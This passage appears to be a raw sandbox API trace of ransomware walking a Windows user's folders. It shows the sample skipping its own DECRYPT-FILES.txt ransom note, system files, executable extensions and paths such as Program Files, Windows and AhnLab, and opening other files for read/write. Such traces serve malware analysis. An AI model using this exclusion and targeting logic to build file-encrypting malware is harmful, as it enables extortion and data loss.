dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.418] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.418] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.418] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.418] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.418] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.418] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.418] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.418] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.418] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.418] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.418] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.418] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.418] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.418] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.418] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.418] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned 85 [0180.418] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.418] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\" [0180.418] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\0a16c9.tmp" [0180.419] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.419] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.419] CloseHandle (hObject=0x0) returned 0 [0180.419] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.419] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa47e8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.419] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.419] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="P7Y3F7QB", cAlternateFileName="")) returned 1 [0180.419] lstrcmpW (lpString1="P7Y3F7QB", lpString2=".") returned 1 [0180.419] lstrcmpW (lpString1="P7Y3F7QB", lpString2="..") returned 1 [0180.419] lstrcatW (in: lpString1="P7Y3F7QB", lpString2="\\" | out: lpString1="P7Y3F7QB\\") returned="P7Y3F7QB\\" [0180.419] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpString2="P7Y3F7QB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\" [0180.419] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\Program Files") returned 0x0 [0180.419] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch=":\\Windows") returned 0x0 [0180.419] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\Games\\") returned 0x0 [0180.419] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.420] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.420] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.420] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.420] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.420] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\All Users") returned 0x0 [0180.420] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.420] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.420] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.420] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="AhnLab") returned 0x0 [0180.420] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.420] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\") returned 94 [0180.420] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.420] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\\\0a16c9.tmp") returned 105 [0180.420] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\p7y3f7qb\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0180.425] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\") returned 94 [0180.425] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.425] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\\\DECRYPT-FILES.txt") returned 112 [0180.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\p7y3f7qb\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.427] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\") returned 94 [0180.427] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\*" [0180.427] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xeeab4b80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeab4b80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0180.427] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.427] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xeeab4b80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeab4b80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.427] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.427] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.427] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeab4b80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeab4b80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeab4b80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.427] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.427] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.427] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.427] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.427] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.427] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.427] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.427] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.427] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.427] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.427] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.427] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.427] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.427] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.427] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.427] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\") returned 94 [0180.427] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.427] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\" [0180.428] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\0a16c9.tmp" [0180.428] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.428] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\p7y3f7qb\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.428] CloseHandle (hObject=0x0) returned 0 [0180.428] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.428] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa47e8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.428] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.428] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa47e8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.428] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0180.428] CloseHandle (hObject=0x27c) returned 1 [0180.428] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="P7Y3F7QB\\", cAlternateFileName="")) returned 0 [0180.428] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0180.429] CloseHandle (hObject=0x274) returned 1 [0180.429] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeea1c600, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeea1c600, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeea1c600, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.429] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.429] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.429] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.429] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.429] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.429] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.429] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.429] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.429] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.429] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.429] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.429] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.429] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.429] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.429] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.429] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned 70 [0180.429] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.429] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\" [0180.429] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\0a16c9.tmp" [0180.429] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.429] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.430] CloseHandle (hObject=0x0) returned 0 [0180.430] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.430] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa47e8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.430] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.430] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="macromedia.com", cAlternateFileName="MACROM~1.COM")) returned 1 [0180.430] lstrcmpW (lpString1="macromedia.com", lpString2=".") returned 1 [0180.430] lstrcmpW (lpString1="macromedia.com", lpString2="..") returned 1 [0180.430] lstrcatW (in: lpString1="macromedia.com", lpString2="\\" | out: lpString1="macromedia.com\\") returned="macromedia.com\\" [0180.430] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="macromedia.com\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\" [0180.430] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\Program Files") returned 0x0 [0180.430] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch=":\\Windows") returned 0x0 [0180.430] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\Games\\") returned 0x0 [0180.430] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.430] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.430] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.430] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.430] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.430] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\All Users") returned 0x0 [0180.430] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.430] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.430] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.430] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="AhnLab") returned 0x0 [0180.430] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.430] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned 85 [0180.430] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.430] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\\\0a16c9.tmp") returned 96 [0180.430] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0180.432] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash 